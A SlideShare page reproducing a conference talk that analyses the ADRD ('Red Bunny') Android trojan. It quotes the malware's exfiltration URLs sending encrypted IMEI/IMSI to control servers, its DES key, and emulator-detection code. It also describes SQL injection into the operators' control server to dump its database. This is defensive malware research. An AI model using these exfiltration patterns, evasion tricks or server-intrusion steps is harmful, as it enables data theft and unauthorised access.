SlideShare a Scribd company logo

Lost in Translation: Analyzing Malware on Android Phones

RootedCON
RootedCON

The document discusses the Android architecture and tools used for analyzing Android applications. It describes analyzing the Red Bunny (ADRD) malware sample in detail, including decrypting communications, analyzing database schemes and control servers, and examining updated application payloads. Dynamic analysis techniques are outlined for monitoring an emulator or device in real time.

1 of 32
Download to read offline
! Lost in translation WTF is happening inside my Android Phone Ok Cancel
8:30 PM Contents Contents Android System Static Analysis Dynamic Analysis Reversing Red Bunny Conclusion Cancel
8:30 PM Android architecture
8:30 PM DALVIK VM - Register-based virtual machine - It uses its own bytecode, not Java bytecode. - Run on a slow CPU with little RAM. - Run on an operating system without swap space. - Optimized for memory efficiency. - Dex class file format.
8:30 PM Dex file format header string_ids type_ids proto_ids field_ids method_ids class_defs data
8:30 PM Analysis Environment Tools Case-sensitive file system :D Android SDK Android NDK Android source code Eclipse Apktool, Dex2jar, JD-GUI Android Emulator
8:30 PM Example .java/jd-gui Compiler dex2jar .java/source .dex/dexdump .smali/baskmali baskmali
8:30 PM Anti-analysis Examples: - Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems. - Medium: Optimize/ofuscate the code with ProGuard. - Hard: Modify bytecode to break reversing tools (be sure that it still runs on Dalvik.) if self.__value_type >= VALUE_SHORT Ej: androguard-a1: ... elif self.__value_type == VALUE_ARRAY : ... elif self.__value_type == VALUE_BYTE : Insert value type ... VALUE_ANNOTATION elif self.__value_type == VALUE_NULL : ... elif self.__value_type == VALUE_BOOLEAN : ... else : raise(“oops”)
8:30 PM Dynamic Analysis Basic: - Create an Android Virtual Device. -> $android (SDK) - $emulator -port 5560 @virtual-device -tcpdump capture.pcap - $adb install app.apk - $adb shell monkey -v -p package.app 700 - $adb shell logcat -d && $adb shell logcat -b events -d (radio also) - $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
8:30 PM Make it more real - Simulate phone events: Send SMS: echo sms send +34656566789 test | nc localhost 5554 D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c Simulate calls: $echo gsm call +34656566789 |nc localhost 5554 $echo gsm accept +34656566789 |nc localhost 5554 $echo gsm cancel +34656566789 |nc localhost 5554 Change GPS coordinates: $echo geo fix -82.411629 28.054553|nc localhost 5554
8:30 PM Dynamic Analysis Advance: - Create you own system image and modify the java classes to log the program flow. Example, framework/base/core/java/android/os/ Process.java
8:30 PM Compiling Android Kernel modules $git clone git://android.git.kernel.org/kernel/common $git branch -a $git checkout --track -b android-goldfish-2.6.29 origin/android- goldfish-2.6.29 $adb pull /proc/config.gz ./;gunzip config.gz; mv config .config Edit and Add CONFIG_MODULES=y (disable by default on emulator kernel) $emulator -avd armv5y -kernel /tmp/zImage
8:30 PM System-Call Hooking $grep sys_call_table System.map
8:30 PM Anti-VM - Detecting the emulator is very easy: DEVICE_ID: String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID); boolean emulator = TextUtils.isEmpty(id); Solution: Change secure->android_id on data/data/com.android.providers.settings/databases/settings.db IMSI: TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE); String imsi = manager.getSubscriberId(); (00000... on emulator) Solution: Patch the emulator binary (search for +CGSN string) or the emulator source code (external/ qemu/telephony/android_modem.c).
8:30 PM More Anti-VM - LocationManager.NETWORK_PROVIDER -> IllegalArgumentException - Detect ADB stuff.. process, network, debug enabled... - /proc/cpuinfo - > Hardware : Goldfish - vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t change) (Thanks Ehooo) - Qemu specific detection (Google) Solution: Patch emulator, Qemu, system hooking...
8:30 PM Alternatives to Android Emulator - http://www.android-x86.org/ . Supports VMware - Use a real phone... Slower
8:30 PM Attack Vectors - Alternative markets, repacked applications. -SMS, MMS vulnerabilities, Fuzzing!!!. - Wireless, Bluetooth Drivers - NFC - System componentes: Webkit, sound library, Kernel.
8:30 PM Third party software Source: http://android.git.kernel.org/
8:30 PM ADRD aka Redbunny - "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" ( http://blog.aegislab.com/index.php? op=ViewArticle&articleId=75&blogId=1 ) ! Notification - "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]" - Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011: * Name: com.beautyfullivewallpaper * Date: Feb. 2, 2011, 1:49 p.m. - Also known as HongTouTou
8:30 PM Detection - Permission list:  * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS.. - Cipher module/library calls (DES):  * init        Ljavax/crypto/Cipher;    Lcom/xxx/yyy/ddda;    decrypt - Function calls to retrieve the IMSI/IMEI codes:  * IMEI:    getDeviceId       Lcom/xxx/yyy/MyService;    onCreate  * IMSI:    getSubscriberId     Lcom/xxx/yyy/MyService;    onCreate - HTTP Requests (GET and POST):  * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;  * adrd.xiaxiab.com     POST    /index.aspx? im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace 3ed65910991f4dbd438af
8:30 PM Detection - Sends http requests through a proxy:  * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default- proxy", localHttpHost); - Services:  * com.xxx.yyy.MyService  * .beauty.Beauty - Intents:  * android.intent.action.BOOT_COMPLETED **** -> Boots at system startup  * android.intent.action.PHONE_STATE  * android.net.conn.CONNECTIVITY_CHANGE
8:30 PM Analysis I Service module (MyService): Sets a Proxy for GET/POST and - Sets the preferred apn 1 HTTP specially crafted headers - Runs each 12 hours (UA, MIME types) - Looks for specific APN network : 2 “CMWAP” || “UNIWAP” Cipher data module Send data to adrd.taxuan.net/ public static String encrypt/decrypt 3 index.aspx?im=%s: Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding"); + IMEI + IMSI Loop + Netway (preferred APN) + Decrypt response + iversion + Switch(cmd) It depends on the + oversion 4 + 0 Do nothing + 1 adad.StartGo() adad.StartGo() + 2 ParseO 5 Sends http://adrd.xiaxiab.com/pic.aspx?im= + 3 UpdateHelper() +encrypt(IMEI+IMSI Parses the big list of ulrs/referers B#1#963a_w1|http://59.173.12.105/g/ UpdateHelper installs the update g.ashx?w=963a_w1 apk 6 BBBB.Go() -> Retrieves search lists of wap.baidu.com FixUrls(): Send random requests adding BAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parse server response (number, flags, tags..): Sends log data to control servers 6 T213607170863|12345|+ -10086+ abc -597| [ ' 6
8:30 PM Analysis II - Following the encryption routines, the DES key is found…: this.kk = "48734154"; * UpdateHelper class: public class UpdateHelper { private static String savefilepath = "/myupdate.apk"; private Context ct; private int netway; * Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom) and also SMS charges. - Server URLs (there are more): http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA - We want to know more!!
8:30 PM Control Servers - adrd.xiaxiab.com from an eagle view: * Microsoft-IIS/6.0 * Debug Enabled (Displaying .NET errors and backtraces) * Hidden paths to the .Net/aspx application * ALL is Chinese! (WTF!?!"·$%&/(?) - Possible vector attacks: * HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
8:30 PM Control Servers - First results: Search * Exceptions in chinese. Google Translate is your friend * Errors at .NET (it didn't generate any html list/table, or view to use for data displaying) * We got a successful Sql injection after the last ciphered parameter :D). * User without admin privileges. * Permissions to run Backups + Shared Resources = Timeout * Other possibilities: + 1: Create a temporal db, with just one table each time, dump paginated rows and run backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang didn't help) + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for performance reason.
8:30 PM Database Information - All the scheme obtained: list of Tables, Fields, types, stored procedures - IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts - The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that points to adrd.xiaxiab.com/down.aspx ! * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int * Store procedure: --if (@netwap=2) select 'T-1|T11' --select 'T3http://adrd.xiaxiab.com/down.aspx' --select 'T213607170863|12345|+ -10086+ abc -597| [ ' --else --select 'T013607170863' * Looks that they were considering the netwap (based on the mobile operator) as a criteria to send commands * TX (where X seems to be a command type) * 13607170863 is a phone number located at Wuhan
8:30 PM Database Scheme t_baiduHourPercent: autoid, mHour, mPercent t_ : myear, mmonth, mday, mhour, total t_baidukeyword: keyword, viewcount t_ : way, flag t_baidukeywordflash: keyword t_baiduOrtherKey: keyword, viewcount t_ : keyword, flag t_baidupwd: id, way, username, pwd t_ _wap: keyword, flag t_baiduwayname: way, wayname t_ _wap_back : keyword, flag t_keywordResult: id, keyword, link, head, flag t_androidtemplog: id, imsi, way, result, createtime t_ _wap_back : keyword, flag t_keywordResult20100601: id, keyword, link, head, flag t_ : flag t_keywordResult20101108: id, keyword, link, head, flag t_ : keyword, createtime t_baiduHourPercent20101012: autoid, mHour, mPercent t_androidtemplog_backup: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_androidtemperrlog: id, compresslog, decompresslog, createtime t_ : keyword, createtime t_androidtemplog_backup201101: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_android : id, imei, imsi, logs, ip, createtime, netway t_android : , , , , createtime t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid t_ : way, maxClick, minClick, leaveTotalClick, leaveEffectClick t_ _wap_20100323: keyword, createtime t_ _wap_20100722 : keyword, createtime
8:30 PM Myupdate.apk - It uses the main package of the ADRD family xxx.yyy. - The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS.. - Looks like a google reader - It adds a local sqlite DB (keyword storage). go_g1_sms: id, keyword, type, flag go_g2_sms: id, keyword, keyword2 - SMSObserver: * Replaces keywords on SMS’s. * Sends SMS!
8:30 PM Samples Package name Md5 Adrd Ver IVer com.beautyfullivewallpaper 4556a687a2845bf4dfac62c594938cf3 adrd.zt.cw.1 6 com.yodesoft.yohandcar 6783cee889fa64df68af58a56ff6e362 adrd.zt.2 6 com.binaryloft.live.winter aa5216da617839e818d83d8185da42b0 adrd.zt.jtj.2 6 com.magicwach.rdefense 839c37f3a2c8d31561d28f619a2a712e adrd.zt.cw.3 6 com.tat.livewallpaper.dandelion 5192ad05597e7a148f642be43f6441f6 adrd.zt.cw.4 6 com.classicnerds.livewallpaper.HK b72724d8fc0f633194dcc3bd28eec026 adrd.zt.cw.5 7 fishnoodle.night_city a01ba26a34e55f71873782348ff5e074 adrd.zt.dxm.6 7 com.appspot.swisscodemonkeys.steam cdfca19bf212adf3292e4fe677fe46a6 adrd.zt.cw.7 7 kr.mobilesoft.yxplayer e3cc6c7af0d83fe322116254c01cf720 adrd.zt.cw.8 7 com.labgency.wallpapers.waves 7d764347a0b0c9d11160d7a7684bf02b adrd.zt.dxm.8 7 com.laucass.andromax 627f41c8f8e7ab007641c4a0c1d8ce1b adrd.zt.cw.9 7 com.digitalchocolate.androidrollergapp 71c0a67daa544450d7c620a48cc059b0 drd.zt.cw.12 7 proscio.wallpaper.shamroc e09782d35d72a769dc7454adb6d8e2e9 adrd.zt.cw.15 7  com.tt.yy f2596f8f3c52381318f62d1ab161c284 ?? ??
8:30 PM Infections g Geolocation
8:30 PM Infections g Infections by operator +20K different IMSIs Other affected operators: Far EasT one Peoples Telephone Company Hutchison 3G PCCW Mobile Sunday Hong Kong Telecom Smart One Mobile
8:30 PM Thank You ! Questions? Ok Cancel @jaimeblascob @PabloForThePPL

Recommended

Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...RootedCON
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
mimikatz @ rmll
mimikatz @ rmllmimikatz @ rmll
mimikatz @ rmllBenjamin Delpy
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 

Recommended

Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...RootedCON
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
mimikatz @ rmll
mimikatz @ rmllmimikatz @ rmll
mimikatz @ rmllBenjamin Delpy
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
9 password security
9 password security9 password security
9 password securitydrewz lin
 
Как мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияКак мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияPositive Hack Days
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Attacking Big Data Land
Attacking Big Data LandAttacking Big Data Land
Attacking Big Data LandJeremy Brown
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
 
Password Security
Password SecurityPassword Security
Password SecurityCSCJournals
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITYSupanShah2
 
Summer of Fuzz: macOS
Summer of Fuzz: macOSSummer of Fuzz: macOS
Summer of Fuzz: macOSJeremy Brown
 
Tatu: ssh as a service
Tatu: ssh as a serviceTatu: ssh as a service
Tatu: ssh as a servicePino deCandia
 
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSHJeremy Brown
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden TicketGiuseppe Trotta
 
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPPositive Hack Days
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoShakacon
 
Django cryptography
Django cryptographyDjango cryptography
Django cryptographyErik LaBianca
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Android Development Tools
Android Development ToolsAndroid Development Tools
Android Development ToolsDominik Helleberg
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisBGA Cyber Security
 

More Related Content

What's hot

"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
9 password security
9 password security9 password security
9 password securitydrewz lin
 
Как мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияКак мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияPositive Hack Days
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Attacking Big Data Land
Attacking Big Data LandAttacking Big Data Land
Attacking Big Data LandJeremy Brown
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
 
Password Security
Password SecurityPassword Security
Password SecurityCSCJournals
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITYSupanShah2
 
Summer of Fuzz: macOS
Summer of Fuzz: macOSSummer of Fuzz: macOS
Summer of Fuzz: macOSJeremy Brown
 
Tatu: ssh as a service
Tatu: ssh as a serviceTatu: ssh as a service
Tatu: ssh as a servicePino deCandia
 
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPPositive Hack Days
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoShakacon
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 

What's hot (20)

"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
 
9 password security
9 password security9 password security
9 password security
 
Как мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияКак мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управления
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
 
Attacking Big Data Land
Attacking Big Data LandAttacking Big Data Land
Attacking Big Data Land
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
 
Password Security
Password SecurityPassword Security
Password Security
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITY
 
Summer of Fuzz: macOS
Summer of Fuzz: macOSSummer of Fuzz: macOS
Summer of Fuzz: macOS
 
Tatu: ssh as a service
Tatu: ssh as a serviceTatu: ssh as a service
Tatu: ssh as a service
 
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSH
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
 
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAP
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
 
Django cryptography
Django cryptographyDjango cryptography
Django cryptography
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
 

Similar to Lost in Translation: Analyzing Malware on Android Phones

IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisBGA Cyber Security
 
Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysisIbrahim Baliç
 
Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Codemotion
 
Ato2019 weave-services-istio
Ato2019 weave-services-istioAto2019 weave-services-istio
Ato2019 weave-services-istioLin Sun
 
Weave Your Microservices with Istio
Weave Your Microservices with IstioWeave Your Microservices with Istio
Weave Your Microservices with IstioAll Things Open
 
All Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioAll Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioLin Sun
 
Mist.io @ AWSUGGR
Mist.io @ AWSUGGRMist.io @ AWSUGGR
Mist.io @ AWSUGGRunweb.me
 
KSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxKSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxNashet Ali
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionFelipe Prado
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityАліна Шепшелей
 
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"Inhacking
 
Android crash debugging
Android crash debuggingAndroid crash debugging
Android crash debuggingAshish Agrawal
 
KDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics TutorialKDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics TutorialNeera Agarwal
 
Dmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI IntroDmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI IntroDefconRussia
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with FalcoMichael Ducy
 
Android things introduction - Development for IoT
Android things introduction - Development for IoTAndroid things introduction - Development for IoT
Android things introduction - Development for IoTBartosz Kosarzycki
 
Hopping in clouds - phpuk 17
Hopping in clouds - phpuk 17Hopping in clouds - phpuk 17
Hopping in clouds - phpuk 17Michele Orselli
 

Similar to Lost in Translation: Analyzing Malware on Android Phones (20)

Android Development Tools
Android Development ToolsAndroid Development Tools
Android Development Tools
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
 
Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysis
 
Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!
 
Ato2019 weave-services-istio
Ato2019 weave-services-istioAto2019 weave-services-istio
Ato2019 weave-services-istio
 
Weave Your Microservices with Istio
Weave Your Microservices with IstioWeave Your Microservices with Istio
Weave Your Microservices with Istio
 
All Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioAll Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istio
 
Mist.io @ AWSUGGR
Mist.io @ AWSUGGRMist.io @ AWSUGGR
Mist.io @ AWSUGGR
 
KSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxKSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptx
 
Android Development Tools
Android Development ToolsAndroid Development Tools
Android Development Tools
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application security
 
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
